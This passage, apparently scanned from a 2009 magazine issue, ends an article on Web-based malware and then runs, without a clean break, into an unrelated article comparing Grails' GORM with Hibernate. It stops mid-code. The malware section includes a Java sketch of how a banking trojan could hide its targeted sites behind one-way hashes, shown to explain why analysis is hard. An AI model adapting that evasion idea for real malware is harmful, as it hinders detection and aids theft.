ity. Any piece of software that is exposed 
to Web content and not up-to-date can 
become the weakest link. 

Many browser plugins and add-ons, 
such as toolbars, do not provide auto- 
matic updates. Furthermore, system 
updates often require a restart after installation, discouraging users from applying security patches promptly.

Even if a system was fully patched, 
the window of vulnerability for some 
software is often very large. According 
to Krebs, major browsers were unsafe 
for as long as 284 days in 2006, and for 
at least 98 days criminals actively used 
vulnerabilities for which no patches 
were available to steal personal and 
financial data from users.” ° Although 
progress on providing fault isolation 
in browsers that may prevent vulnera- 
bilities from being exploited has been 
made,’ ‘1a completely secure browser 
still needs to be developed. 

Detecting Social Engineering Attacks. Many drive-by downloads can be detected automatically via client honeypots. However, when adversaries use social engineering to trick users into installing malicious software, automated detection becomes significantly more complicated. Although user interactions can be simulated by the client honeypot, a fundamental problem is the user's expectation about the functionality of a downloaded application compared to what it actually does. In the video case described earlier, the user expected to watch a video. After downloading and installing such a trojan, nothing usually happens. This could warn the user that something is amiss and might result in the user trying to fix their system. However, there is no reason why the installed software could not also play a video, leaving the user with no reason to suspect that she was infected.

Similarly, in addition to extorting 
the user for money, some of the fake 
anti-virus software does actually have 
some detection capability for old mal- 
ware. The question then is how to deter- 
mine if a piece of software functions as 
advertised. In general, this problem is 
undecidable. For example, the popular Google toolbar allows a user to opt into receiving the PageRank of a visited page. This works by sending the current URL to Google, then returning the associated PageRank and displaying it in the browser. This functionality was desired by the user and was a legitimate feature.
However, a similar piece of software 
might not disclose its functionality and 
send all visited URLs to some ominous 
third party. In that case, we would label 
the software spyware. 

Automated analysis” is more difficult 
when malicious activity is triggered only 
under certain conditions. For example, 
some banking trojans watch the URL in 
the browser window and overlay a fake 
input field only for specific banking Web 
sites. Automated tools may discover the overlay functionality, but if the trojan were to compare visited URLs against one-way hashes, determining which banks were targeted could be rather difficult.
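The hashing trick can be illustrated with a short Java sketch. The check stores only SHA-256 digests of the targeted host names. The trojan can therefore still recognize a targeted site at runtime. An analyst who extracts the list, however, sees only digests and must hash candidate names (for example, a list of known banking domains) to learn which sites are covered. The host names and class name are hypothetical, and real malware may hash full URLs or use other functions.

```java
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
import java.security.NoSuchAlgorithmException;
import java.util.Locale;
import java.util.Set;

// Membership check against a list that contains only one-way hashes.
final class HashedTargetList {
    private final Set<String> targetHashes; // digests only; host names never stored

    HashedTargetList(Set<String> targetHashes) {
        this.targetHashes = targetHashes;
    }

    static String sha256Hex(String s) {
        try {
            byte[] digest = MessageDigest.getInstance("SHA-256")
                    .digest(s.getBytes(StandardCharsets.UTF_8));
            StringBuilder sb = new StringBuilder();
            for (byte b : digest) {
                sb.append(String.format("%02x", b)); // unsigned two-digit hex per byte
            }
            return sb.toString();
        } catch (NoSuchAlgorithmException e) {
            throw new IllegalStateException(e); // every Java platform must provide SHA-256
        }
    }

    // True if the visited host is on the list. Reading the list reveals nothing
    // unless the analyst already guesses the right host name.
    boolean isTargeted(String host) {
        return targetHashes.contains(sha256Hex(host.toLowerCase(Locale.ROOT)));
    }
}
```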


Conclusion 

Without doubt, Web-based malware is 
a security concern for many users. Un- 
fortunately, the root cause that allows 
the Web to be leveraged for malware 
delivery is an inherent lack of security 


in its design: neither Web applications nor the Internet infrastructure supporting these applications were designed with a well-thought-out security model. Browsers evolved in complexity to support a wide range of applications, inherited some of these weaknesses, and added more of their own. While some of the solutions in this space are promising and may help reduce the magnitude of the problem, safe browsing will remain a much sought-after goal that deserves serious attention from academia and industry alike.
Dynamic languages offer a taste of object-

Active Record and GORM use these dynamic capabilities in ways that can significantly simplify an application.

This article looks at how GORM works. It compares and contrasts GORM with Hibernate, focusing on three areas: defining object-relational mapping; performing basic save, load, and delete operations on persistent objects; and executing queries. It describes how GORM leverages the dynamic features of Groovy to provide a different flavor of ORM that has some limitations but, for many applications, is much easier to use.


Groovy, Grails, and GORM 


GORM is the persistence component of Grails, an open source framework that aims to simplify Web development. Grails is written in Groovy, a dynamic, object-oriented language that runs on the JVM (Java Virtual Machine). Because Groovy interoperates seamlessly with Java, Grails can leverage several mature Java frameworks. In particular, GORM uses Hibernate, a popular and robust ORM framework.


GORM, however, is much more than a simple wrapper around the Hibernate framework. Instead, it provides a very different kind of API. GORM is different in two ways. First, the dynamic features of the Groovy language enable GORM to do things that are impossible in a static language. Second, the pervasive use of CoC (Convention over Configuration) in Grails reduces the amount of configuration required to use GORM. Let's look at each of these reasons in more detail.


Dynamic Groovy. GORM relies heavily on the dynamic capabilities of the Groovy language. In particular, it makes extensive use of Groovy's ability to define methods and properties at runtime. In a static language such as Java, a property access or a method invocation is resolved at compile time. In comparison, Groovy does not resolve property accesses and method invocations until runtime. A Groovy application can dynamically define methods and properties.
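Java has no equivalent of Groovy's runtime method definition, but the idea Grails builds on can be approximated. The Java sketch below is an analogy, not Groovy's implementation. Calls are routed through a name-to-implementation table. The first call to an unknown name goes through a slow, methodMissing()-style hook that synthesizes and registers an implementation, which is the role ExpandoMetaClass plays in Groovy. Later calls dispatch straight from the table. The class name and its "double" naming rule are hypothetical, chosen to echo the doubleString example.

```java
import java.util.HashMap;
import java.util.Map;
import java.util.function.Function;

// Java analogy for methodMissing() plus ExpandoMetaClass: dispatch by name through a
// table, and define missing methods lazily on first use.
final class ExpandoLikeObject {
    private final Map<String, Function<Object[], Object>> methods = new HashMap<>();
    int missingCalls = 0; // how many times the slow path ran

    Object invoke(String name, Object... args) {
        Function<Object[], Object> impl = methods.get(name);
        if (impl == null) {
            impl = methodMissing(name); // slow path: synthesize the method...
            methods.put(name, impl);    // ...and register it so later calls skip this step
        }
        return impl.apply(args);
    }

    // Hypothetical convention: any "double..." method concatenates its argument with itself.
    private Function<Object[], Object> methodMissing(String name) {
        missingCalls++;
        if (name.startsWith("double")) {
            return args -> String.valueOf(args[0]) + args[0];
        }
        throw new UnsupportedOperationException("No method " + name);
    }
}
```

Calling `invoke("doubleString", "ACM Queue")` twice returns "ACM QueueACM Queue" both times. The missing-method hook runs only once.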
Groovy provides a couple of different ways to add methods and properties to a class at runtime. The simplest approach is to define propertyMissing() or methodMissing() methods. The propertyMissing() method is called by the Groovy runtime when the application attempts to access an undefined property. Similarly, the methodMissing() method is called when the application calls an undefined method. These methods enable an object to behave as if the property or method existed.

The second and more sophisticated approach is to use the wonderfully named ExpandoMetaClass. Every Groovy class has a metaClass property that returns an ExpandoMetaClass. An application can add methods or properties to a class by manipulating this metaclass. For example, Figure 1 is a code snippet that adds a method to the String class that concatenates a string with itself.

Figure 1.

groovy:000> String.metaClass.doubleString = { -> delegate + delegate }
===> groovy.lang.ExpandoMetaClass$ExpandoMetaProperty@14a18d
groovy:000> "ACM Queue".doubleString()
===> ACM QueueACM Queue

This code snippet obtains the String metaclass and assigns to its doubleString property a closure (a kind of anonymous method) that implements the new method.

50 COMMUNICATIONS OF THE ACM APRIL 2009

Groovy applications often use methodMissing() and ExpandoMetaClass together. The first time an undefined method is invoked, methodMissing() defines the method using the ExpandoMetaClass. The next time around, the newly defined method is called directly, thereby bypassing the relatively expensive methodMissing() mechanism.

Later you will see how Grails uses methodMissing() and ExpandoMetaClass to inject persistence-related methods and properties into domain classes at runtime, thereby simplifying application code.

Figure 2.

Using Annotations for ORM

import java.util.Set;
import javax.persistence.*;

@Entity
class Customer {

    @Id
    @GeneratedValue
    private long id;

    @Version
    private long version;

    private String name;

    @OneToMany
    private Set<Account> accounts;
}

Using XML for ORM

<hibernate-mapping default-access="field">
    <class name="Customer">
        <id name="id">
            <generator class="native"/>
        </id>
        <version name="version"/>
        <property name="name"/>
        <set name="accounts">
            <key/>
            <one-to-many class="Account"/>
        </set>
    </class>
</hibernate-mapping>

Convention over configuration. The second key idea in GORM is CoC. Its premise is that a framework should have sensible defaults and should not require developers to explicitly configure every facet; instead, only the exceptional cases should require configuration. CoC was first popularized by the Rails and Grails frameworks, but mainstream Java EE frameworks including Spring¹⁶ have begun to adopt the concept. Today, developers expect modern Java EE frameworks to require much less configuration than older frameworks.

CoC is used throughout Grails. For example, built-in defaults determine how to map an HTTP request to a handler class. Similarly, GORM has rules for defining which classes to persist and for deriving default table and column names. Because of CoC, a typical Grails application contains significantly less configuration code and metadata than an application using a traditional framework.
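To make the CoC defaults concrete, the following Java sketch derives table, column, and foreign-key names from class and property names. It assumes a camelCase-to-underscore rule, which agrees with the customer table and the customer_id foreign key used in this article. The helper names are hypothetical. Check the documentation for the exact naming strategy a given Grails version applies.

```java
// Hypothetical helper illustrating convention-based naming (camelCase -> snake_case).
final class NamingConvention {
    private NamingConvention() {}

    // "BankAccount" -> "bank_account", "dateCreated" -> "date_created"
    static String toSnakeCase(String camel) {
        StringBuilder sb = new StringBuilder();
        for (int i = 0; i < camel.length(); i++) {
            char c = camel.charAt(i);
            if (Character.isUpperCase(c)) {
                if (i > 0) {
                    sb.append('_'); // word boundary inside the name
                }
                sb.append(Character.toLowerCase(c));
            } else {
                sb.append(c);
            }
        }
        return sb.toString();
    }

    static String tableFor(Class<?> type) { return toSnakeCase(type.getSimpleName()); }

    static String columnFor(String property) { return toSnakeCase(property); }

    // Foreign key for a reference property, e.g. customer -> customer_id.
    static String foreignKeyFor(String property) { return toSnakeCase(property) + "_id"; }
}
```

Only a name that breaks these rules needs explicit configuration. That is the CoC premise in miniature.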

Now that we have looked at the key 
underpinnings of GORM, let’s learn 
how to use it. 


GORM Mapping 

A key part of using an ORM framework is specifying how the object model maps to the database. The developer must specify how classes map to tables, attributes map to columns, and relationships map to either foreign keys or join tables. This section looks at how this works using a traditional ORM framework and then how it is accomplished in Grails.

Mapping with XML and annotations. The persistent state of a Java class is either its fields or its properties. A field is the Java equivalent of an instance variable. A property is defined by getter and setter methods that follow the JavaBeans® naming conventions. For example, getFoo() and setFoo() define the property called foo. The getter and setter methods often provide access to a field of the same name as the property, although they are not required to do so.

A Hibernate application can map the fields or properties of domain classes to the database schema using either XML or annotations. Figure 2 shows an annotation example on the left and an XML example on the right. Both examples persist the fields of the Customer class, but an application can persist properties instead, either by annotating the getter methods or by omitting the default-access attribute from the XML document.

XML and annotations produce equivalent metadata. They both specify that the Customer class is persistent. They also specify that Hibernate should generate an object's primary key using whatever mechanism is appropriate for the underlying database and store it in the id field. The version field is configured to store a Hibernate-maintained version number. They both persist the name field and specify that the accounts field represents a one-to-many relationship.

XML and annotations both have defaults for table and column names. The table name defaults to the name of the class, and the column name defaults to the name of the property. You can override these defaults using extra annotations or XML attributes and elements. For example, you can specify the table name using the @Table annotation or the name attribute of the <class> element.

Each approach has benefits and drawbacks. One advantage that XML has over annotations is that it separates the O/R mapping from the Java code, which decouples the domain classes from Hibernate. One problem with this separation is that it can be more difficult to keep the mapping and code in sync. XML also tends to be more verbose than annotations. Moreover, the XML mapping must explicitly list all of the persistent properties of a class, whereas fields of certain basic types such as Customer.name are automatically persistent when using annotations.

Another problem is that, regardless of whether you are using XML or annotations, you often need to add fields to store the primary key and a version number. The primary-key field is usually required by Hibernate or by a domain object's clients. The version number is used for optimistic locking. The trouble with these fields, however, is that the application's business logic typically does not require them. They must be added to every domain class solely to support persistence.
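The version number supports optimistic locking. An update succeeds only if the row still carries the version the application originally read, and each successful update increments that version. A minimal in-memory Java sketch of the check follows. The store and its method names are hypothetical, and the comment shows roughly the SQL an ORM would issue. In Hibernate, a failed check surfaces as an exception rather than a false return value.

```java
import java.util.HashMap;
import java.util.Map;

// Minimal in-memory sketch of version-based optimistic locking (hypothetical store).
final class VersionedStore {
    static final class Row {
        final String name;
        final long version;

        Row(String name, long version) {
            this.name = name;
            this.version = version;
        }
    }

    private final Map<Long, Row> rows = new HashMap<>();

    void insert(long id, String name) { rows.put(id, new Row(name, 0)); }

    Row load(long id) { return rows.get(id); }

    // Models: UPDATE t SET name = ?, version = version + 1 WHERE id = ? AND version = ?
    // Returns false when the row changed since it was read (zero rows updated).
    boolean update(long id, String newName, long versionReadEarlier) {
        Row current = rows.get(id);
        if (current == null || current.version != versionReadEarlier) {
            return false;
        }
        rows.put(id, new Row(newName, versionReadEarlier + 1));
        return true;
    }
}
```

If two users load the same row and both try to save, the first update wins and bumps the version. The second update then fails instead of silently overwriting the first.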

O/R mapping in GORM. Grails relies heavily on Convention over Configuration when defining ORM. It automatically treats classes in the grails-app/domain directory as persistent. GORM automatically persists the properties of each class. It derives default table and column names from the class and property names. GORM also adds primary-key and version-number properties to each class.


The following is an example do- 
main class. The Customer class has a 
field called name. Also, because this 
field has default visibility, Groovy auto- 
matically defines the name property by 
defining getName() and setName() 
methods. 


class Customer {
    String name
}


GORM automatically maps the Customer class to the customer table and maps the name property to the name column. GORM adds an id property to the class and maps it to a primary-key column called id. It also adds a version property and maps it to a version column. Unlike a traditional ORM framework, GORM requires very little configuration, provided that the database schema matches the defaults.

Another nice feature of GORM is that it will maintain creation and last-updated times for domain model classes. You simply have to define lastUpdated and dateCreated properties on your classes, and GORM will automatically update them. In comparison, you must write code to do this when using vanilla Hibernate.

Figure 3.

(a)
Session session = sessionFactory.getCurrentSession();
Account account = (Account) session.get(Account.class, pk);

(b)
interface AccountDao {
    Account get(long accountId);
}

class AccountDaoImpl implements AccountDao {

    private final SessionFactory sessionFactory; // supplied when the DAO is created

    AccountDaoImpl(SessionFactory sessionFactory) {
        this.sessionFactory = sessionFactory;
    }

    public Account get(long accountId) {
        Session session = sessionFactory.getCurrentSession();
        return (Account) session.get(Account.class, accountId);
    }
}

GORM also makes it easy to map re- 
lationships by using static properties 
to supply metadata in a similar fashion
to annotations in other languages. For 
example, the static property hasMany 
defines the one-to-many relationships 
for a domain class. The value of the 
hasMany property is a map. Each map 
entry defines a one-to-many relation- 
ship: its key is the name of the property 
that stores the collection, and its value 
is the class of the collection elements. 
For each one-to-many relationship 
GORM adds a property to store the col- 
lection of objects, as well as methods 
for maintaining the relationship. 

The following is an example of how 
to map a one-to-many relationship be- 
tween the Customer class and the Ac- 
count class. 


class Customer {
    static hasMany = [accounts: Account]
}

class Account {
    static belongsTo = Customer
    Customer customer
}


The collection of accounts is stored in a property called accounts, which GORM adds to the Customer class at runtime. The relationship is mapped using a foreign key called customer_id in the account table. The belongsTo property specifies that a Customer owns the account and that the account should be deleted if the customer is deleted.

GORM also dynamically defines a couple of methods for managing this relationship. The addToAccounts() method adds an account to the collection, and the removeFromAccounts() method removes an account. These methods also maintain the inverse relationship from Account to Customer. By automatically defining these methods, which would otherwise have to be written by hand, GORM simplifies the code and makes it less error prone.
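For comparison, here is roughly what hand-written equivalents of addToAccounts() and removeFromAccounts() look like in plain Java. The point is the bookkeeping: each call must update both the collection on Customer and the back-reference on Account. This Java sketch reproduces the behavior described above; it is not GORM's generated code. Returning `this` to allow chained calls is a design choice made here.

```java
import java.util.HashSet;
import java.util.Set;

// Hand-written version of the relationship helpers GORM adds at runtime.
class Customer {
    private final Set<Account> accounts = new HashSet<>();

    Set<Account> getAccounts() { return accounts; }

    Customer addToAccounts(Account account) {
        accounts.add(account);
        account.setCustomer(this); // keep the inverse side (Account -> Customer) in sync
        return this;               // allows c.addToAccounts(a1).addToAccounts(a2)
    }

    Customer removeFromAccounts(Account account) {
        accounts.remove(account);
        account.setCustomer(null); // clear the back-reference as well
        return this;
    }
}

class Account {
    private Customer customer;

    Customer getCustomer() { return customer; }

    void setCustomer(Customer customer) { this.customer = customer; }
}
```

Forgetting either half of each method leaves the object graph inconsistent. This is exactly the kind of error that generating the methods avoids.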

Configuring the mapping. CoC reduces the amount of configuration that is required. Sometimes, however, you need to specify some aspects of the ORM. For example, table or column names might not match the defaults, or perhaps a class has derived properties that should not be persisted. To support these requirements, GORM lets you specify various aspects of the ORM. Rather than using a different configuration language such as XML or annotations, however, GORM uses snippets of Groovy code in the domain classes.

Here is an example of how to over- 
ride the default table and column 
names and specify that a property 
should not be persisted. 


class Customer {
    static transients = ["networth"]

    static mapping = {
        id column: 'customer_id'
        table 'crc_customer'
        columns {
            name column: 'customer_name'
        }
    }

    def getNetworth() {
        def networth = 0
        accounts.each { networth += it.balance } // accumulate each account's balance
        networth
    }
}
In this example, the transients property, which is a list of property names, specifies that the networth property is not persistent. This property calculates the total balance of the customer's accounts and is defined by the getNetworth() method. The mapping property maps the Customer class to the crc_customer table, the id property to the customer_id column, and the name property to the customer_name column.

The value of the mapping property is a Groovy closure object, which is a kind of anonymous method. Although it might not be immediately apparent, the body of the mapping closure is a sequence of method calls. For example, "id column: 'customer_id'" is a call to an id method with a map parameter containing a single entry that has column as the key and 'customer_id' as the value.
(a)
class AccountDaoImpl ... {
    public List<Account> findByBalanceLessThan(double threshold) {
        Session session = sessionFactory.getCurrentSession();
        Query query = session.createQuery("from Account where balance < ?");
        query.setParameter(0, threshold); // positional ? parameters are numbered from 0
        return (List<Account>) query.list();
    }
}

(b)
class AccountDaoImpl ... {
    public List<Account> findByBalanceLessThan(double threshold) {
        Criteria c = sessionFactory.getCurrentSession().createCriteria(Account.class);
        c.add(Restrictions.lt("balance", threshold));
        return (List<Account>) c.list();
    }
}

(a)
def accounts = Account.findAllByBalanceLessThan(threshold)

(b)
List accounts = Account.findAll("from Account where balance < ?", [threshold])

(c)
def c = Account.createCriteria()
def results = c.list {
    lt("balance", threshold)
}

The mapping closure is an example of a DSL (domain-specific language),' which is a mini-language for representing information about a domain. Grails uses DSLs for a variety of configuration tasks, and Groovy applications often define one or more DSLs as well. Several features of the Groovy language make it easy to write DSLs, including closures, literal lists and maps, and a flexible syntax that does not, for example, require parentheses around method arguments. These features enable a developer to write highly readable and concise DSLs without having to go outside of the language and use mechanisms such as XML.
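The claim that the mapping closure is just a sequence of method calls can be illustrated in Java. Java lacks Groovy's flexible call syntax, but a fluent builder can express the same calls. The MappingBuilder class below is hypothetical, and the table and column names come from the Customer mapping example. Because Java cannot call a method named after an arbitrary property, the Groovy line `name column: 'customer_name'` becomes `column("name", "customer_name")`.

```java
import java.util.LinkedHashMap;
import java.util.Map;
import java.util.function.Consumer;

// Hypothetical Java counterpart of the mapping closure: each line becomes a method call.
final class MappingBuilder {
    String table;
    final Map<String, String> columnNames = new LinkedHashMap<>();

    // Groovy: table 'crc_customer'
    MappingBuilder table(String name) {
        this.table = name;
        return this;
    }

    // Groovy: id column: 'customer_id'  (a call to id() with a one-entry map)
    MappingBuilder id(Map<String, String> options) {
        columnNames.put("id", options.get("column"));
        return this;
    }

    // Groovy: columns { ... }  (a call whose argument is a closure; here a Consumer)
    MappingBuilder columns(Consumer<MappingBuilder> block) {
        block.accept(this);
        return this;
    }

    MappingBuilder column(String property, String column) {
        columnNames.put(property, column);
        return this;
    }
}
```

Usage mirrors the Groovy closure line by line: `new MappingBuilder().id(Map.of("column", "customer_id")).table("crc_customer").columns(c -> c.column("name", "customer_name"))`.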


Manipulating Persistent Objects

Applications must save, load, and delete persistent objects. A traditional ORM framework provides an API object that has methods for manipulating persistent data. GORM, however, takes a very different and simpler approach that leverages Groovy's ability to define new methods at runtime.

When using a traditional ORM framework, the application manipulates persistent data by invoking methods on an API object. For example, a Hibernate application uses a Session object, which represents a connection to the database, to save, load, and delete persistent objects. Note that an application usually needs to save only newly created objects. Most ORM frameworks, including Hibernate, track changes to persistent objects and automatically update the database.
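Automatic updating rests on change tracking. One common approach, sketched below in Java under simplifying assumptions, is to snapshot an object's persistent state when it is loaded. At flush time, each object is compared against its snapshot, and an UPDATE is issued only for objects that changed. Hibernate's dirty checking follows a broadly similar idea but is considerably more elaborate. ToySession, its single tracked field, and the generated SQL strings are hypothetical.

```java
import java.util.ArrayList;
import java.util.HashMap;
import java.util.List;
import java.util.Map;

// Toy illustration of snapshot-based dirty checking; not Hibernate's implementation.
final class ToySession {
    static final class Account {
        final long id;
        double balance;

        Account(long id, double balance) {
            this.id = id;
            this.balance = balance;
        }
    }

    // Account does not override equals/hashCode, so keys are compared by identity.
    private final Map<Account, Double> snapshots = new HashMap<>();

    // "Loading" an object also records a copy of its persistent state.
    Account load(long id, double balanceInDb) {
        Account a = new Account(id, balanceInDb);
        snapshots.put(a, balanceInDb);
        return a;
    }

    // At flush time, compare each object with its snapshot and emit UPDATEs for changes.
    List<String> flush() {
        List<String> sql = new ArrayList<>();
        for (Map.Entry<Account, Double> e : snapshots.entrySet()) {
            Account a = e.getKey();
            if (a.balance != e.getValue()) {
                sql.add("UPDATE account SET balance = " + a.balance + " WHERE id = " + a.id);
                e.setValue(a.balance); // the written state becomes the new snapshot
            }
        }
        return sql;
    }
}
```

The application only assigns `a.balance = 75.0`; it never calls a save method. The UPDATE appears at the next flush.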

Figure 3a shows a code snippet that 
illustrates how an application can load 
an account with the specified primary 
key. This code snippet obtains the cur- 
rent Session and calls get() to load 
the specified account. 

An application’s business logic 
could use the Session directly. Doing 
so, however, would violate the Separa- 
tion of Concerns principle.’ The ap- 
plication code would be a mix of busi- 
ness logic and persistence logic, which 
makes it more complex and much 
more difficult to test. It also tightly 
couples the business logic to the ORM 
framework, which is undesirable given the furious rate at which Java EE frameworks evolve.


A better approach is to use the DAO 
(data-access object) pattern,® which en- 
capsulates the data-access logic within 
a DAO class. A DAO defines methods 
for persisting, loading, and deleting 
objects. It also defines finder meth- 
ods, which execute queries and are dis- 
cussed in more detail later. The DAO 
methods are invoked by the business 
logic and call the ORM framework to 
access the database. 

Figure 3b shows an example of a 
Hibernate DAO for the Account do- 
main class. This DAO consists of the 
AccountDao interface, which defines 
the public methods, and an AccountDaoImpl class, which implements the
interface and calls Hibernate to access 
the database. 

The DAO pattern simplifies the 
business logic and decouples it from 
the ORM framework, but it has some 
drawbacks. The first problem is that 
many DAOs consist of cookie-cutter 
code that is tedious to develop and 
maintain. This has caused some devel- 
opers to abandon the DAO pattern and 
write business logic that directly calls 
the ORM framework, despite the draw- 
backs of doing so. 

One way to reduce the amount of cookie-cutter code is to use a generic DAO. This consists of a superinterface, which defines the CRUD (create, read, update, delete) operations, and a superclass, which implements them. The superinterface and the superclass are parameterized by the entity class, which makes them strongly typed. Application DAOs extend the generic DAO interface and implementation class. Using a generic DAO eliminates some but not all of the cookie-cutter code, so it’s only a partial solution.

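A rough Python analogue of a generic DAO follows, with typing.Generic playing the role of Java generics. The class names, the key_of parameter, and the in-memory dictionary are assumptions made for illustration. CRUD is written once; the application-specific finder in CustomerDao still has to be written by hand, which is why the text calls this only a partial solution.

```python
from dataclasses import dataclass
from typing import Callable, Dict, Generic, List, Optional, TypeVar

T = TypeVar("T")  # entity type
K = TypeVar("K")  # primary-key type


class GenericDao(Generic[T, K]):
    """Hypothetical generic DAO: CRUD implemented once, parameterized by entity and key type."""

    def __init__(self, key_of: Callable[[T], K]) -> None:
        self._key_of = key_of          # how to read an entity's primary key
        self._rows: Dict[K, T] = {}    # in-memory stand-in for the database

    def save(self, entity: T) -> None:
        self._rows[self._key_of(entity)] = entity

    def get(self, key: K) -> Optional[T]:
        return self._rows.get(key)

    def delete(self, entity: T) -> None:
        self._rows.pop(self._key_of(entity), None)

    def find_all(self) -> List[T]:
        return list(self._rows.values())


@dataclass
class Customer:
    customer_id: int
    name: str


class CustomerDao(GenericDao[Customer, int]):
    """Inherits CRUD for free; only the application-specific finder is hand-written."""

    def __init__(self) -> None:
        super().__init__(key_of=lambda c: c.customer_id)

    def find_by_name_prefix(self, prefix: str) -> List[Customer]:
        return [c for c in self.find_all() if c.name.startswith(prefix)]
```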
Another problem with using DAOs is that some application classes might not be able to reference them. Modern Java EE applications resolve inter-component references using a mechanism known as dependency injection. When the application starts up, an assembler instantiates each application component and injects it with references to the required components. Resolving inter-component references in this way simplifies the components and promotes loose coupling.

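A minimal sketch of constructor-based dependency injection, assuming hand-written wiring in place of a real container; RegistrationService, CustomerDao, and assemble() are hypothetical names. The service never constructs or looks up its DAO; the assembler supplies it at startup. The sketch also hints at the limitation discussed next: an object that application code creates directly, outside assemble(), receives no injected references.

```python
from typing import Dict, List


class CustomerDao:
    """Hypothetical DAO component; storage is a plain list."""

    def __init__(self) -> None:
        self.saved: List[str] = []

    def save(self, name: str) -> None:
        self.saved.append(name)


class RegistrationService:
    """A component: it declares its dependency instead of looking it up."""

    def __init__(self, customer_dao: CustomerDao) -> None:
        self.customer_dao = customer_dao  # injected by the assembler

    def register(self, name: str) -> None:
        self.customer_dao.save(name.strip())


def assemble() -> Dict[str, object]:
    """Toy assembler: instantiates each component and wires references at startup."""
    dao = CustomerDao()
    service = RegistrationService(customer_dao=dao)
    return {"customerDao": dao, "registrationService": service}
```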
One limitation of dependency injec- 
tion, however, is that it does not easily 
allow noncomponents such as domain 

objects to obtain references to components such as DAOs. Domain objects are instantiated by the application rather than by the component assembler. It’s tricky, although not impossible, for the component assembler to intercept the instantiation of such objects and inject dependencies. As a result, business logic residing in domain objects cannot always reference components such as DAOs.

There are a couple of ways to work around this limitation. Components such as services, which can use dependency injection, pass DAOs as method parameters to domain classes, which cannot. This works well in some situations, but in more complex cases the code becomes cluttered with extra parameters. Another workaround is to move the code that needs to use the DAOs into components where it can use dependency injection. The trouble with moving business logic out of the entities is that it degrades the design and results in an anemic domain model.

Dynamic persistence methods in GORM. GORM provides a different style of persistence API. Rather than providing an API object, it injects methods for saving, loading, and deleting persistent objects into domain classes. This mechanism decouples the business logic from the underlying ORM framework without having to use DAOs. It also eliminates the need for application code to obtain references to the ORM framework API objects or DAOs.


GORM injects several methods into domain classes, including save(), which saves a newly created object; get(), which loads an object by its primary key; and delete(), which deletes an object. Here is an example that uses these methods:


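    // save(), get(), and delete() are not declared in Customer; GORM injects them
    Customer c = new Customer("John Doe")
    if (!c.save())                      // save() returns null if validation fails
        fail "save failed"
    Customer c2 = Customer.get(c.id)    // load by primary key
    c2.delete()
    assertNull Customer.get(c.id)       // the deleted customer is no longer found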


This example creates a Customer object and saves it in the database by calling save(). It then loads the customer by calling Customer.get(). Finally, it deletes the customer by calling delete(). Note that none of these methods is defined in the source code for the Customer class. GORM implements them using the methodMissing()/ExpandoMetaClass mechanism described earlier.

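The core idea, attaching persistence methods at runtime to a class that never declared them, can be sketched in Python. This is an analogy, not GORM’s implementation: add_persistence_methods and the dictionary store are hypothetical, no database is involved, and Python’s setattr on a class stands in for Groovy’s ExpandoMetaClass.

```python
from itertools import count
from typing import Any, Dict, Optional


def add_persistence_methods(cls: type, store: Dict[int, Any]) -> type:
    """Hypothetical helper: attach save/get/delete to an existing class at runtime."""
    next_id = count(1)  # stand-in for a database-generated primary key

    def save(self) -> Any:
        if self.id is None:
            self.id = next(next_id)
        store[self.id] = self
        return self  # truthy on success, loosely mirroring the Groovy `if (!c.save())` check

    def delete(self) -> None:
        store.pop(self.id, None)

    def get(klass: type, ident: int) -> Optional[Any]:
        return store.get(ident)

    cls.save = save
    cls.delete = delete
    cls.get = classmethod(get)
    return cls


class Customer:
    """Declares no persistence methods of its own."""

    def __init__(self, name: str) -> None:
        self.name = name
        self.id: Optional[int] = None


add_persistence_methods(Customer, store={})
```

After the call, Customer("John Doe").save(), Customer.get(...), and delete() work even though the class body never mentions them.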
GORM’s dynamically defined persistence methods eliminate a lot of DAO code while decoupling application code from the ORM framework. GORM sidesteps the problem of how noncomponents obtain references to DAOs: code anywhere in a GORM application can perform data-access operations. Of course, whether that is always appropriate is another issue since, as I discuss later, it can result in database-access code being scattered throughout the application.


One significant limitation of GORM is that it does not support multiple databases. A Hibernate application explicitly uses a particular session and can thereby select which database to access. A GORM application uses the persistence methods that are injected into domain classes and cannot select which database to use. Moreover, as of the time of writing, the mechanism used for configuring GORM does not support multiple databases. This limitation might prevent many applications from using GORM, including those that scale horizontally by using multiple databases.


Executing Queries


An application may not know the primary keys of the objects it needs to load. Instead, it must execute a query that retrieves objects based on the values of their attributes. When using a traditional ORM framework, an application executes queries by invoking methods on API objects provided by the framework. This code is usually encapsulated by DAOs to decouple the application from the ORM framework. As with persistence methods, GORM takes a different approach that often simplifies application code.

Hibernate provides several ways to execute queries. An application can, for example, use the Query interface to execute queries written in HQL (Hibernate Query Language), which is a powerful object-oriented, textual query language. Figure 4a is a DAO finder that retrieves accounts with balances less than some minimum.

54 COMMUNICATIONS OF THE ACM | APRIL 2009

This method obtains a Session 
and creates a Query object. It then sets 
the query’s parameter and executes the 
query, which returns a list of Account 
objects. 

A Hibernate application can also use the Criteria Query API to execute queries. This API provides methods for building a query programmatically. It is especially useful when an application needs to build a query dynamically, since it eliminates the need to concatenate query string fragments. (Figure 4b is an example of a criteria query that finds accounts with low balances.) This code snippet creates a Criteria object for the Account class. It then adds a restriction and executes the query.

One problem with the DAO finders is that most have the same structure as the example: create a query, set the parameters, and execute the query. The only variables are the query and the parameters. As with the persistence methods, these cookie-cutter methods and the DAOs that contain them are tedious to develop, test, and maintain.


Dynamic GORM Finders 
GORM has a dynamic finder mecha- 
nism that eliminates the need to write 
simple queries and DAO finder meth- 
ods. It uses Groovy’s dynamic capabili- 
ties to add finder methods to domain 
classes. For example, an application 
can find accounts with low balances, as 
shown in Figure 5a. Provided that the method name follows certain naming conventions, the methodMissing()/ExpandoMetaClass mechanism intercepts the call to the method and defines a method that parses the method name to build a query and executes it.

GORM dynamic finders support a rich query language. Finder method names can use comparison operators such as equals, less than, and greater than. They can also use the and, or, and not logical operators. Even though the query language is limited to the properties of a single class (no joins), many queries can be expressed as dynamic finders. A GORM application contains much less data-access code and has far fewer explicit dependencies on the Hibernate framework. In addition, because the finder methods are readily available on the domain classes, GORM avoids the problem of needing to resolve inter-component references.

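The intercept-parse-define cycle can be sketched in Python, with a metaclass __getattr__ standing in for Groovy’s methodMissing(). This is an analogy under stated assumptions, not GORM’s code: only a findAllBy prefix with optional LessThan and GreaterThan suffixes is recognized (GORM supports many more), matching runs over an in-memory list rather than generating a query, and Account, DynamicFinderMeta, and FINDER_NAME are hypothetical names. A GORM-style name such as findAllByBalanceLessThan is used only to show the parsing.

```python
import re
from typing import Any, Callable, Dict, List

# Comparison suffixes understood by this hypothetical sketch (a small subset).
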